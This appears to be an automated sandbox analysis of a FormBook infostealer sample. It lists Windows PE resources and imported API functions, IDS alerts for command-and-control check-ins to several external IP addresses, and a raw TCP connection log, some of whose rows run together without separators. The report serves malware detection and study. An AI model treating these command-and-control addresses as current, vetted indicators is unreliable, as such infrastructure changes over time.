                                                  RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                                  RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                                  RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                                  RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                                  RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                                  RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                                  RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
                                                  RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                  RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                                  RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                  RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                  RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                  RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                  RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                  RT_RCDATA | 0xd07b8 | 0x5a48c | data | - | - | 1.0003272003547825
                                                  RT_GROUP_ICON | 0x12ac44 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                                  RT_GROUP_ICON | 0x12acbc | 0x14 | data | English | Great Britain | 1.25
                                                  RT_GROUP_ICON | 0x12acd0 | 0x14 | data | English | Great Britain | 1.15
                                                  RT_GROUP_ICON | 0x12ace4 | 0x14 | data | English | Great Britain | 1.25
                                                  RT_VERSION | 0x12acf8 | 0x10c | data | English | Great Britain | 0.5932835820895522
                                                  RT_MANIFEST | 0x12ae04 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                  DLL | Import
                                                  WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                  VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                  PSAPI.DLL | GetProcessMemoryInfo
                                                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dll | IsThemeActive
                                                  KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                  USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                  GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                  COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                                  ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                  SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                  OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                  Language of compilation system | Country where language is spoken | Map
                                                  English | Great Britain | -
                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                  07/02/24-14:07:01.922969 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.4 | 3.33.130.190
                                                  07/02/24-14:06:46.303031 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49736 | 80 | 192.168.2.4 | 84.32.84.112
                                                  07/02/24-14:08:39.009481 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49761 | 80 | 192.168.2.4 | 109.95.158.127
                                                  07/02/24-14:07:17.766594 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49743 | 80 | 192.168.2.4 | 78.111.111.51
                                                  07/02/24-14:07:36.301715 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49749 | 80 | 192.168.2.4 | 172.67.200.242
                                                  07/02/24-14:07:55.738870 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.4 | 116.213.43.190
                                                  07/02/24-14:07:44.596745 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49751 | 80 | 192.168.2.4 | 188.114.97.3
                                                  07/02/24-14:07:49.702879 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49753 | 80 | 192.168.2.4 | 188.114.97.3
                                                  07/02/24-14:07:15.236401 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.4 | 78.111.111.51
                                                  07/02/24-14:09:00.595741 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49763 | 80 | 192.168.2.4 | 162.0.213.72
                                                  07/02/24-14:07:28.626581 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.4 | 172.67.200.242
                                                  07/02/24-14:08:31.344522 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49758 | 80 | 192.168.2.4 | 109.95.158.127
                                                  07/02/24-14:07:22.830857 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49745 | 80 | 192.168.2.4 | 78.111.111.51
                                                  07/02/24-14:07:59.523620 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49755 | 80 | 192.168.2.4 | 116.213.43.190
                                                  07/02/24-14:07:42.060544 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.4 | 188.114.97.3
                                                  07/02/24-14:08:33.882411 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49759 | 80 | 192.168.2.4 | 109.95.158.127
                                                  07/02/24-14:07:31.173075 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49747 | 80 | 192.168.2.4 | 172.67.200.242
                                                  07/02/24-14:07:01.922969 | TCP | 2856318 | ETPRO TROJAN FormBook CnC Checkin (POST) M4 | 49738 | 80 | 192.168.2.4 | 3.33.130.190
                                                  07/02/24-14:07:09.547482 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49741 | 80 | 192.168.2.4 | 3.33.130.190
                                                  07/02/24-14:09:06.390818 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49765 | 80 | 192.168.2.4 | 162.0.213.72
                                                  07/02/24-14:08:04.861584 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49757 | 80 | 192.168.2.4 | 116.213.43.190
                                                  07/02/24-14:08:58.056879 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49762 | 80 | 192.168.2.4 | 162.0.213.72
                                                  07/02/24-14:07:04.478292 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49739 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Jul 2, 2024 14:06:46.263716936 CEST | 49736 | 80 | 192.168.2.4 | 84.32.84.112
                                                  Jul 2, 2024 14:06:46.268544912 CEST | 80 | 49736 | 84.32.84.112 | 192.168.2.4
                                                  Jul 2, 2024 14:06:46.268634081 CEST | 49736 | 80 | 192.168.2.4 | 84.32.84.112
                                                  Jul 2, 2024 14:06:46.303030968 CEST | 49736 | 80 | 192.168.2.4 | 84.32.84.112
                                                  Jul 2, 2024 14:06:46.314713955 CEST | 80 | 49736 | 84.32.84.112 | 192.168.2.4
                                                  Jul 2, 2024 14:06:46.773809910 CEST | 80 | 49736 | 84.32.84.112 | 192.168.2.4
                                                  Jul 2, 2024 14:06:46.773828983 CEST | 80 | 49736 | 84.32.84.112 | 192.168.2.4
                                                  Jul 2, 2024 14:06:46.773842096 CEST | 80 | 49736 | 84.32.84.112 | 192.168.2.4
                                                  Jul 2, 2024 14:06:46.773966074 CEST | 49736 | 80 | 192.168.2.4 | 84.32.84.112
                                                  Jul 2, 2024 14:06:46.776957989 CEST | 49736 | 80 | 192.168.2.4 | 84.32.84.112
                                                  Jul 2, 2024 14:06:46.782212019 CEST | 80 | 49736 | 84.32.84.112 | 192.168.2.4
                                                  Jul 2, 2024 14:07:01.874866009 CEST | 49738 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:01.880852938 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.4
                                                  Jul 2, 2024 14:07:01.880942106 CEST | 49738 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:01.922969103 CEST | 49738 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:01.927834988 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.4
                                                  Jul 2, 2024 14:07:02.366219997 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.4
                                                  Jul 2, 2024 14:07:02.366278887 CEST | 49738 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:03.444808960 CEST | 49738 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:03.450254917 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.4
                                                  Jul 2, 2024 14:07:04.467611074 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:04.472637892 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.4
                                                  Jul 2, 2024 14:07:04.472814083 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:04.478291988 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:04.483962059 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.4
                                                  Jul 2, 2024 14:07:04.942056894 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.4
                                                  Jul 2, 2024 14:07:04.942177057 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:05.991560936 CEST | 49739 | 80 | 192.168.2.4 | 3.33.130.190
                                                  Jul 2, 2024 14:07:05.996473074 CEST80497393.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.010162115 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:07.015022993 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.015108109 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:07.017208099 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:07.022105932 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022115946 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022159100 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022224903 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022233963 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022252083 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022259951 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022362947 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.022372007 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.492958069 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:07.493246078 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:08.522850037 CEST4974080192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:08.702892065 CEST80497403.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:09.540884018 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:09.545787096 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:09.545871019 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:09.547482014 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:09.552675962 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:10.032242060 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:10.032632113 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:10.032690048 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:10.034487963 CEST4974180192.168.2.43.33.130.190
                                                  Jul 2, 2024 14:07:10.039310932 CEST80497413.33.130.190192.168.2.4
                                                  Jul 2, 2024 14:07:15.229793072 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:15.234581947 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.234668016 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:15.236401081 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:15.241164923 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.971025944 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.971051931 CEST804974278.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:15.971141100 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:16.741624117 CEST4974280192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.759876013 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.764764071 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:17.764859915 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.766593933 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:17.771359921 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:18.480823040 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:18.480926991 CEST804974378.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:18.480981112 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:19.272766113 CEST4974380192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.291213989 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.296124935 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.298950911 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.301001072 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:20.305819035 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.305860996 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.305870056 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306076050 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306085110 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306099892 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306107998 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306116104 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:20.306123972 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:21.084012985 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:21.084398031 CEST804974478.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:21.084455013 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:21.804059982 CEST4974480192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.822352886 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.827528000 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:22.828941107 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.830857038 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:22.840926886 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581276894 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581300020 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581310034 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:23.581505060 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:23.583995104 CEST4974580192.168.2.478.111.111.51
                                                  Jul 2, 2024 14:07:23.588846922 CEST804974578.111.111.51192.168.2.4
                                                  Jul 2, 2024 14:07:28.611445904 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:28.616502047 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:28.617113113 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:28.626580954 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:28.634252071 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:29.294024944 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:29.294047117 CEST8049746172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:29.294118881 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:30.147747993 CEST4974680192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.166341066 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.171264887 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.171364069 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.173074961 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:31.177967072 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.817847013 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.819001913 CEST8049747172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:31.819058895 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:32.679080009 CEST4974780192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.697302103 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.702234983 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.702341080 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.704408884 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:33.709207058 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709217072 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709227085 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709234953 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709275961 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709407091 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709414959 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709428072 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:33.709435940 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:34.369199038 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:34.370341063 CEST8049748172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:34.370382071 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:35.210294008 CEST4974880192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.282033920 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.286987066 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:36.287053108 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.301714897 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:36.306566000 CEST8049749172.67.200.242192.168.2.4
